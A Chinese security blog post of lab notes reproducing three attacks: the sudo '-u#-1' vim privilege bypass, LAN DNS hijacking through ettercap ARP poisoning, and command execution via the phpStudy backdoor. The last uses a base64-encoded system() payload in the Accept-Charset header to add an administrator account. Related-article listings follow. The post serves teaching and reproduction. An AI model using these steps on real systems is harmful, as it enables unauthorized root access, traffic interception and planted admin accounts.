sudo逻辑漏洞/局域网DNS劫持/phpstudy后门复现

最新推荐文章于 2022-09-26 22:14:35 发布
最新推荐文章于 2022-09-26 22:14:35 发布
阅读量329 收藏
点赞数 1
分类专栏: 【渗透笔记】
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/104850669
版权

渗透笔记之sudo逻辑漏洞

Sudo 利用vim编辑器进行一个权限绕过
1.创建用户useradd 用户名
passwd 用户名
password 密码
2.用root账号修改/etc/sudoers配置文件在文件里添加
新用户名 ALL = (ALL, !root) /usr/bin/vim
新用户名 ALL = (ALL, !root) /usr/bin/id
在这里插入图片描述
强制保存退出
3.切换用户 su用户名 sudo -u#-1 vim
命令执行成功以后就会进入下图这样的界面
在这里插入图片描述
4.然后我们直接执行:!命令 例如 :!whoami
在这里插入图片描述
5.可以看到刚才执行不了的命令都可以执行了 然后看一下 whoami 自己的身份
在这里插入图片描述
哒哒哒~
在这里插入图片描述

渗透笔记之局域网DNS劫持

1.搭建好一个自己的网站。
2.Kali-编辑文件 vim /etc/ettercap/etter.dns
在这里插入图片描述
3.添加红框里的两行进去 *匹配符可以匹配所有域名

  •              A         自己网站Ip

  •              PTR       自己网站ip

在这里插入图片描述
4.点击----搜索----软件名 ettercap
在这里插入图片描述
在这里插入图片描述

5.(默认网卡基本都是eth0 然后点击确定)
在这里插入图片描述
6.扫描----一一列出来扫描到的ip
在这里插入图片描述
7.选中网关---- add to target1
在这里插入图片描述
8.其他---- add target2
在这里插入图片描述
9.Mitm->ARP_posining
在这里插入图片描述
10.
在这里插入图片描述
11.plugin->manage plugin里面双击dns spoof 来激活这个插件
在这里插入图片描述
在这里插入图片描述

12.访问任意网站尝试结果
在这里插入图片描述

渗透笔记之phpstudy后门复现

在这里插入图片描述
1.把杀毒软件关闭,防止把后门删除。
2.安装好phpstudy和BURP
3.运行phpstudy
在这里插入图片描述
4.打开cmd–执行命令Ipconfig–查找到无线网ip
在这里插入图片描述
5.打开自己搭建网站,输入无线ip地址10.2.96.58
在这里插入图片描述
6.打开BURP抓包
在这里插入图片描述
7.浏览器设置本机代理(谷歌)
在这里插入图片描述
在这里插入图片描述

8.浏览器重新发送请求,抓包
在这里插入图片描述
9.点击重发器
在这里插入图片描述
在这里插入图片描述

10.需要把两个空格删掉
在这里插入图片描述
11.添加Accept-Charset:system(“whoami”);并对system(“whoami”);进行base64编码
在这里插入图片描述
在这里插入图片描述

发送查看结果
在这里插入图片描述
12.使用命令添加用户(命令:net user 账号 密码 /add)
对system(“net user shenlian 123123 /add”); 进行base64编码
在这里插入图片描述
13.执行net user命令查看用户
在这里插入图片描述
在这里插入图片描述

14.执行 net localgroup administrators 账户名 /add 给予管理员权限
在这里插入图片描述
在这里插入图片描述

晚风不及你ღ
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【权限提升】Linux Sudo权限提升漏洞(CVE-2023-22809)
做自己喜欢的事,并将其发挥到极致!
04-05 7725
sudo 允许系统管理员将权限委托给某些用户(或用户组),能够以ROOT用户或其他用户身份运行部分(或全部)命令。由于Sudo中的sudoedit对处理用户提供的环境变量(如SUDO_EDITOR、VISUAL和EDITOR)中传递的额外参数存在缺陷。当用户指定的编辑器包含绕过sudoers策略的 " –" 参数时,拥有sudoedit访问权限的本地攻击者可通过将任意条目附加到要处理的文件列表中,最终在目标系统上实现权限提升。
sudo堆缓冲区溢出提权漏洞(CVE-2021-3156)
Ryan的博客
01-13 2648
sudo堆缓冲区溢出提权漏洞(CVE-2021-3156)
sudo漏洞
Arvin627的博客
08-15 2102
Sudo本地权限提升漏洞(CVE-2017-1000367) Sudo权限绕过漏洞(CVE-2019-14287)
隐藏了十年的 Sudo 漏洞曝出:无需密码就能获取 root 权限
CSDN资讯
01-29 2623
整理 | 郑丽媛出品 | CSDN(ID:CSDNnews)Sudo,想必但凡接触过 Linux 或 Unix 操作系统的开发者都知道这个可以“为所欲为”的应用程序,系统管理员可通过 S...
Linux sudo权限提升漏洞(CVE-2021-3156)
Vdieoo的博客
01-27 1万+
1月26日,Sudo发布安全通告,修复了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。只要存在sudoers文件(通常是/etc/sudoers),攻击者就可以使用本地普通用户利用sudo获得系统root权限。请受影响的用户尽快采取措施进行防护。 影响范围 受影响版...
sudo-1.9.13p3.tar.gz
03-31
sudo 当前最新版 1.9.13 源码包 修复安全漏洞,升级更新sudo版本
Linux sudo 漏洞可能导致未经授权的特权访问
01-20
在 Linux 中利用新发现的 sudo 漏洞可以使某些用户以 root 身份运行命令,尽管对此还有所限制。 sudo 命令中最近发现了一个严重漏洞,如果被利用,普通用户可以 root 身份运行命令,即使在 /etc/sudoers 文件中明确...
sudo插件,需要另一个人来批准和监视特权sudo会话-C/C++开发
05-26
sudo_pair sudo_pair是sudo的插件,需要另一个人来批准和监视特权sudo会话。 关于sudo,工程师每天都使用sudo来以特权用户身份运行命令。 但是在某些敏感的sudo_pair上sudo_pair是sudo的插件,需要另一个人来批准和...
详解Linux下的sudo及其配置文件/etc/sudoers的详细配置
09-15
主要介绍了详解Linux下的sudo及其配置文件/etc/sudoers的详细配置的相关资料,需要的朋友可以参考下
rosdistro(如果sudo redep init / resdop update报错,你可以用到它)
04-23
你可以参考我的博客,怎么用它来解决sudo redep init / resdop update报错问题 博客:Ubuntu18.04安装ros保姆级教程 https://blog.csdn.net/weixin_46416035/article/details/124366949?spm=1001.2014.3001.5502
Sudo 本地提权漏洞(CVE-2021-3156)
千年板蓝根
04-27 978
漏洞描述: 国外研究团队发现sudo堆溢出漏洞(CVE-2021-3156),漏洞隐藏十年之久,普通用户可以通过利用此漏洞,在默认配置的 sudo 主机上获取root权限。漏洞细节已在互联网上公开,腾讯安全专家提醒linux系统管理员尽快修复。 Sudo是一个功能强大的实用程序,大多数基于Unix和Linux的操作系统都包含Sudo。 成功利用此漏洞,任何没有特权的用户都可以在易受攻击的主机上获得root特权。研究人员已经在Ubuntu 20.04(Sudo 1.8.31),Debian 10(Sudo
Linux网络实战 (一) —— DNS配置详解(安装与使用DNS
何义竏
11-27 2万+
Linux网络实战—— DNS配置Linux网络实战 (一) —— DNS配置Linux 本机DNS配置Linux主机名配置文件添加一个新的主机名映射删除一个主机名映射实例安装DNS服务软件源码安装BIND在线安装BINDDNS服务器启动/关闭Linux service 命令bind服务管理DNS服务器配置正解与反解的Zone意义`Bind`配置文件介绍编程要求 Linux网络实战 (一) —— DNS配置 Linux 本机DNS配置   无论在局域网还是Internet上,每台主机都有一个IP地址,是为了
LINUX修改DNS方法
热门推荐
datuzijean的博客
06-17 6万+
搭建环境的时候,有时候会遇到服务器之间ping不通,有可能是DNS地址的问题,导致不在统一网段。此时就要把测试服务器改成统一的DNS服务器地址了 一、DNS的临是修改。(重启后失效) vim/etc/resolv.conf //打开resolv.conf 文件 改为如下内容: nameserver 8.8.8.8 #修改成你的主DNS nameserver 8.8.7.7...
Ubuntu(20.04):设置DNS
风静如云的博客
09-26 8038
注:/etc/resolv.conf,这文件为临时文件,如果直接修改该文件,那么重启后,之前保存子啊该文件中设置的DNS无法得到保存。编辑文件/etc/systemd/resolved.conf。设置DNS=8.8.8.8 114.114.114.114。
设置DNS的两种方法(Ubuntu)
小猪爱拱地
11-22 1006
1. 修改 /etc/network/interfaces, 添加:
ubuntu DNS修改
orDream的博客
04-04 1万+
一、第一种方法 查看DNS, cat /etc/resolv.conf 能够查看DNS,这个文件是链接到 ll /etc/resolv.conf # /etc/resolv.conf -> /run/resolvconf/resolv.conf 可见这个文件时链接到另一个文件的 真实的原文件时: sudo vi /etc/resolvconf/resolv.conf....
CVE-2021-3156 Sudo溢出漏洞复现
BROTHERYY的博客
01-31 2752
CVE-2021-3156漏洞介绍 Sudo是一个功能强大的工具,其允许普通用户执行root权限命令,大多数基于Unix和Linux的操作系统都包含sudo。 2021年01月26日,sudo被披露存在一个基于堆的缓冲区溢出漏洞(CVE-2021-3156,该漏洞被命名为“Baron Samedit”),可导致本地权限提升。 当在类Unix的操作系统上执行命令时,非root用户可以使用sudo命令来以root用户身份执行命令。由于sudo错误地在参数中转义了反斜杠导致堆缓冲区溢出,从而允许任何本地用户(无论
sudo相关漏洞CVE-2019-18634、CVE-2019-14287
悦分享
08-07 668
实际上,只要用户的权限足够高,即拥有最高sudo权限的用户,并且在Runas规范中定义了ALL关键字的话,他们就可以运行Runas规范中明确禁止使用的那些root命令,而且以这种方式运行的命令其日志项所显示的目标用户为4294967295,而不是root。但是,sudo日志条目中记录下的命令运行用户的ID为“4294967295”,而并非root用户(或用户ID为“0”),除此之外,因为用户ID是通过-u选项指定的,并且不会在密码数据库中存储,所以PAM会话模块也不会运行。上述命令运行之后,将返回“0”。.
Sudo 堆缓冲区溢出致本地提权漏洞(CVE-2021-3156)
qq_42947816的博客
05-29 2897
2021年1月26日,Sudo发布安全通告,修复了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或 -i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。
sudo /usr/sbin/nginx -s stop sudo /usr/sbin/nginx -c /etc/nginx/nginx.conf sudo /usr/sbin/nginx -s reopen
最新发布
01-24
1. `sudo /usr/sbin/nginx -s stop`:这个命令用于停止运行Nginx服务器。`sudo`表示以管理员权限运行命令,`/usr/sbin/nginx`是Nginx服务器的可执行文件路径,`-s stop`表示发送信号给Nginx服务器,让其停止运行。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值